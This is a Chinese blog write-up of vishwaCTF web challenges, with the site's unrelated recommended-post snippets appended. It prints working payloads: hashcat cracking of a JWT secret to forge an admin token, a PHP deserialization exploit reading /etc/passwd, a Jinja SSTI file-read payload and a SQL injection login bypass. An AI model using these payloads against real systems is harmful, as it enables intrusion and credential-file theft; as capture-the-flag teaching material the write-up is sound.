【vishwaCTF】web题解wp

已于 2022-04-12 18:04:42 修改
阅读量1.4k 收藏 3
点赞数
分类专栏: 刷题笔记 文章标签: web安全 php python linux
于 2022-04-12 18:04:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51614272/article/details/124128472
版权

【vishwaCTF】web题解wp

web

Keep Your Secrets(jwt典例)

一打开发现有两个页面,一个页面是注册,一个是admin管理员页面

在这里插入图片描述

注册完成之后会返回一段字符串,分析得到这是一段Token:

在这里插入图片描述

那么我们就可以利用这段Token伪造管理员请求去得到flag
打开jwt.io:要爆破的就是下面这个检验码
打开hashcat,设置掩码爆破或者暴力爆破,5分钟出来了:
或者rockyou.txt,很多密码,秒出结果
密钥是:owasp

在这里插入图片描述

最后POST请求提交作为请求头的Token即可,要放在中间,放在包最后会发生未知错误

在这里插入图片描述

hashcat -a -0 代表字典攻击
-m 16500 代表破解的是jwt
hashcat的wiki:hashcat_WiKihashcat手册
–show代表直接把密钥显示出来

-a  指定要使用的破解模式,其值参考后面对参数。“-a 0”字典攻击,“-a 1” 组合攻击;“-a 3”掩码攻击。
-m  指定要破解的hash类型,如果不指定类型,则默认是MD5
-o  指定破解成功后的hash及所对应的明文密码的存放位置,可以用它把破解成功的hash写到指定的文件中
--force	忽略破解过程中的警告信息,跑单条hash可能需要加上此选项
--show	显示已经破解的hash及该hash所对应的明文
--increment	 启用增量破解模式,你可以利用此模式让hashcat在指定的密码长度范围内执行破解过程
--increment-min  密码最小长度,后面直接等于一个整数即可,配置increment模式一起使用
--increment-max  密码最大长度,同上
--outfile-format 指定破解结果的输出格式id,默认是3
--username 	 忽略hash文件中的指定的用户名,在破解linux系统用户密码hash可能会用到
--remove 	 删除已被破解成功的hash
-r		 使用自定义破解规则

Todo list(php反序列化)

<?php
Class ShowSource{
    public function __toString()
    {
        return highlight_file($this->source, true);
    }
}

if(isset($_GET['source'])){
    $s = new ShowSource();
    $s->source = __FILE__;
    echo $s;
    exit;
}

$todos = [];

if(isset($_COOKIE['todos'])){
    $c = $_COOKIE['todos'];
    $h = substr($c, 0, 40);
    $m = substr($c, 40);
    if(sha1($m) === $h){
        $todos = unserialize($m);
    }
}

if(isset($_POST['text'])){
    $todo = $_POST['text'];
    $todos[] = $todo;
    $m = serialize($todos);
    $h = sha1($m);
    setcookie('todos', $h.$m);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}




 foreach($todos as $todo):
      <label class="todo">
      <input class="todo__state" type="checkbox" />
      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 200 25" class="todo__icon">
        <use xlink:href="#todo__line" class="todo__line"></use>
        <use xlink:href="#todo__box" class="todo__box"></use>
        <use xlink:href="#todo__check" class="todo__check"></use>
        <use xlink:href="#todo__circle" class="todo__circle"></use>
      </svg>
      <div class="todo__text"><?=$todo?></div>
      </label>
    <?php endforeach;

echo触发 __toString
exp:

<?php
Class ShowSource{
    public function __construct()
    {
        $this->source = '/etc/passwd'; //flag.php
    }
}
$todos[]=new ShowSource();
echo sha1(serialize($todos));
echo urlencode(serialize($todos));

Hey Buddy!(SSTI)

payload:

{{().__class__.__bases__[0].__subclasses__()[99](path=%27%27,fullname=%27%27).get_data(%27./flag.txt%27)}}

使用subclasses的第99个库,这个库里有os操作,就可以获取flag

My Useless Website(SQL注入)

直接万能密码注释掉后面就可以了
payload:

https://my-us3l355-w3b51t3.vishwactf.com/?user=1%27%20or%201=1+&pass=1

-+ 或者 ·--就是注释符

Stock Bot(信息检索)

出现了一段payload:
根据:if(!msg.includes(‘Flag’))
猜测product=Flag,得到flag
在这里插入图片描述

Request Me FLAG(数据包请求方式)

以FLAG请求方式请求数据包,得到flag

Strong Encryption(php代码审计)

<?php
 
    // Decrypt -> 576e78697e65445c4a7c8033766770357c3960377460357360703a6f6982452f12f4712f4c769a75b33cb995fa169056168939a8b0b28eafe0d724f18dc4a7
 
    $flag="";
 
    function encrypt($str,$enKey){
 
        $strHex='';
        $Key='';
        $rKey=69;
        $tmpKey='';
 
        for($i=0;$i<strlen($enKey);$i++){
            $Key.=ord($enKey[$i])+$rKey;  //ord()将字符转为10进制
            $tmpKey.=chr(ord($enKey[$i])+$rKey); //chr()10进制转为字符
        }    
 
        $rKeyHex=dechex($rKey); //10进制转为16进制
 
        $enKeyHash = hash('sha256',$tmpKey);
 
        for ($i=0,$j=0; $i < strlen($str); $i++,$j++){
            if($j==strlen($Key)){
                $j=0;
            }
            $strHex .= dechex(ord($str[$i])+$Key[$j]);
        }
        $encTxt = $strHex.$rKeyHex.$enKeyHash;
        return $encTxt;
    }
 
    $encTxt = encrypt($flag, "VishwaCTF");
 
    echo $encTxt;
 
?>

解密脚本:
原过程是每位的十进制加上key再转16进制,反推这个过程就可以得到flag

$str2 = "576e78697e65445c4a7c8033766770357c3960377460357360703a6f6982";
$Key='155174184173188166136153139';   
	for ($i=0,$j=0; $i < strlen($str2); $i++,$j++){
		if($j==strlen($Key)){
			$j=0;
        }
        $a = $str2[$i].$str2[$i+1];
        $flag .= chr(hexdec($a)-$Key[$j]);  
        $i++;
   }
echo "flag: ".$flag;
Sunlight_614
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
西普WEB大部分题解
12-09
西普WEB大部分题解,需要在西普刷题的CTF小伙伴赶紧下载吧
JWT攻击中文手册
12-08 2289
JSON Web Token(JWT)对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键,而且还被视为隐藏了通往以下特权的途径:特权升级,信息泄露,SQLi,XSS,SSRF,RCE,LFI等 ,可能还有更多!攻击令牌的过程显然取决于您正在测试的JWT配置和实现的情况,但是在测试JWT时,通过对目标服务的Web请求中使用的Token进行读取,...
【渗透测试】JWT令牌漏洞攻击
qq_48201589的博客
06-05 585
JSON Web Token(JWT),是一种用户身份凭证,常用作身份验证、会话处理和访问控制机制。若能控制JWT,则有可能造成身份伪造等漏洞攻击。
JWT攻击手册
Forget_liu的博客
04-08 605
JSON Web Token(JWT)是一个开放标准(RFC 7519),用于在双方之间安全地表示声明。JWT是一种无状态的认证机制,通常用于授权和信息交换。JSON Web 令牌结构JSON Web令牌以紧凑的形式由三部分组成,这些部分由点(头部(Header)有效载荷(Payload)签名(Signature)因此,JT通常如下所示。头部(Header)头部用于描述关于该JWT的最基本的信息,通常由两部分组成:令牌的类型(即JWT)和所使用的签名算法。
JWT渗透姿势一篇通
hackzkaq的博客
01-18 899
企业内部产品应用使用JWT作为用户的身份认证方式,在对应用评估时发现了新的关于JWT的会话安全带来的安全问题,后期再整理时又加入了之前遗留的部分JWT安全问题,至此汇总成一篇完整的JWT文章。
JWT攻击手册(附jwt_tool用法,爆破弱密钥等)
热门推荐
weixin_50464560的博客
10-01 1万+
转载至https://www.cnblogs.com/xiaozi/p/12005929.html JSON Web Token(JWT)对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键,而且还被视为隐藏了通往以下特权的途径:特权升级,信息泄露,SQLi,XSS,SSRF,RCE,LFI等 ,可能还有更多!攻击令牌的过程显然取决于您正在测试的JWT配置和实现的情况,但是在测试JWT时,通过对目标服务的Web请求中使用的Token进行读取,篡改和签名,可能遇到已知的
JWT攻击详解 --Burp suit官方靶场
m0_60742333的博客
03-23 1792
JWT详解:JSON 网络令牌 (JWT) 是一种标准化格式,用于在系统之间发送加密签名的 JSON 数据。它们理论上可以包含任何类型的数据,但最常用于发送有关用户的信息(“声明”),作为身份验证、会话处理和访问控制机制的一部分。
JWT安全漏洞以及常见攻击方式
02-18 6152
随着web应用的日渐复杂化,某些场景下,仅使用Cookie、Session等常见的身份鉴别方式无法满足业务的需要,JWT也就应运而生,JWT可以有效的解决分布式场景下的身份鉴别问题,并且会规避掉一些安全问题,如CORS跨域漏洞,CSRF漏洞等。JWT即Json Web Token的缩写,顾名思义,是Token的一种。它常被用来在向服务器发起请求时用作身份认证。使用JWT作为身份认证的优势在于:它不需要在服务端去保留用户的认证信息。
漏洞-JWT安全基础
山下南徒的博客
07-10 2053
JWT安全基础 JWT在线编解码网站 JWT入门教程 JWT手册 jwt_tool 攻击流程 第一步:识别JWT 在Burp Suite的代理历史中,使用以下正则匹配JWT: #网址安全的JWT版本 eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9._-]* #所有JWT版本(误报的可能性更高) eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]* 第二步:基础六式 首先,找到需要JWT认证通过后才能访问的页面,如个人资料页,进行重发JWT,通过响应变化来发现问题。
JWT 攻击 | PortSwigger(burpsuite官方靶场)| Part 1
bin789456的博客
10-05 4158
是token的一种实现,全称为。以形式来说,它就是一个字符串,将用户的信息保存在一个json字符串中,编码后得到的一个token,这个token有签名功能防篡改认证流程:post提交表单后,后端验证完成生成一个jwt,接下来返回该jwt至客户端,随后请求中带上该jwt,即可工作。传统cookie、session对比:1、JWT数据量小,传输速度快2、由于是json,JWT是跨语言的,应用广3、更适用于移动端,因为它们不支持cookie4、避免csrf,因为不依赖cookie。
CyBRICS CTF Quals 2019 Web 题解1
08-04
CyBRICS CTF Quals 2019 Web 题解一大堆字,直接查看final.html的源码,没什么发现然后把final.html删掉,发现index
PAT甲级所有题解代码
02-03
这里包含了179道PAT甲级的代码AC题解,供有需要通过PAT考试的同学下载学习使用。
洛谷CF1458B题解
最新发布
02-05
有关CF1458B的题解
第 14 届蓝桥杯国赛Web题解源码+项目说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...第 14 届蓝桥杯国赛Web题解源码+项目说明.zip
JWT分析
GalaxySpaceX的博客
08-24 146
JWT分析
Hashcat使用指南
网安君的博客
01-19 1万+
Hashcat破解linux shadow的密码0×01 首先了解shadow文件到底是什么?0×02 hashcat的使用 0×01 首先了解shadow文件到底是什么? 登录Linux会要求输入用户名和密码。通常本地文件中会存储一份用户密码,并与用户输入对比,如果相同就允许用户登录。起初用户密码存储与/etc/passwd中,但由于/etc/passwd必须供所有用户读取,因此为了避免密码破译,unix系统将加密后的密码存储于/etc/shadow中,仅供超级用户可读。 /etc/shadow中密码格
hashcat使用教程
Alexz__的博客
03-20 5488
本文转载于:https://www.cnblogs.com/dgjnszf/p/11416671.html hashcat官网:https://hashcat.net/hashcat/ GitHub项目:https://github.com/hashcat/hashcat 使用语法: hashcat.exe [选项] <哈希> <密码字典> ...
(渗透学习)JWT绕过
yang1234567898的博客
12-30 5422
1、什么是JWT 参考文章:https://www.jianshu.com/p/576dbf44b2ae 2、JWT验证绕过 https://jwt.io/
题解
06-01
这道题是一道典型的费用限制最短路题目,可以使用 Dijkstra 算法或者 SPFA 算法来解决。 具体思路如下: 1. 首先,我们需要读入输入数据。输入数据中包含了道路的数量、起点和终点,以及每条道路的起点、终点、长度和限制费用。 2. 接着,我们需要使用邻接表或邻接矩阵来存储图的信息。对于每条道路,我们可以将其起点和终点作为一个有向边的起点和终点,长度作为边权,限制费用作为边权的上界。 3. 然后,我们可以使用 Dijkstra 算法或 SPFA 算法求解从起点到终点的最短路径。在这个过程中,我们需要记录到每个点的最小费用和最小长度,以及更新每条边的最小费用和最小长度。 4. 最后,我们输出从起点到终点的最短路径长度即可。 需要注意的是,在使用 Dijkstra 算法或 SPFA 算法时,需要对每个点的最小费用和最小长度进行松弛操作。具体来说,当我们从一个点 u 经过一条边 (u,v) 到达另一个点 v 时,如果新的费用和长度比原来的小,则需要更新到达 v 的最小费用和最小长度,并将 v 加入到优先队列(Dijkstra 算法)或队列(SPFA 算法)中。 此外,还需要注意处理边权为 0 或负数的情况,以及处理无法到达终点的情况。 代码实现可以参考以下样例代码: ```c++ #include <cstdio> #include <cstring> #include <queue> #include <vector> using namespace std; const int MAXN = 1005, MAXM = 20005, INF = 0x3f3f3f3f; int n, m, s, t, cnt; int head[MAXN], dis[MAXN], vis[MAXN]; struct Edge { int v, w, c, nxt; } e[MAXM]; void addEdge(int u, int v, int w, int c) { e[++cnt].v = v, e[cnt].w = w, e[cnt].c = c, e[cnt].nxt = head[u], head[u] = cnt; } void dijkstra() { priority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int, int>>> q; memset(dis, 0x3f, sizeof(dis)); memset(vis, 0, sizeof(vis)); dis[s] = 0; q.push(make_pair(0, s)); while (!q.empty()) { int u = q.top().second; q.pop(); if (vis[u]) continue; vis[u] = 1; for (int i = head[u]; i != -1; i = e[i].nxt) { int v = e[i].v, w = e[i].w, c = e[i].c; if (dis[u] + w < dis[v] && c >= dis[u] + w) { dis[v] = dis[u] + w; q.push(make_pair(dis[v], v)); } } } } int main() { memset(head, -1, sizeof(head)); scanf("%d %d %d %d", &n, &m, &s, &t); for (int i = 1; i <= m; i++) { int u, v, w, c; scanf("%d %d %d %d", &u, &v, &w, &c); addEdge(u, v, w, c); addEdge(v, u, w, c); } dijkstra(); if (dis[t] == INF) printf("-1\n"); else printf("%d\n", dis[t]); return 0; } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值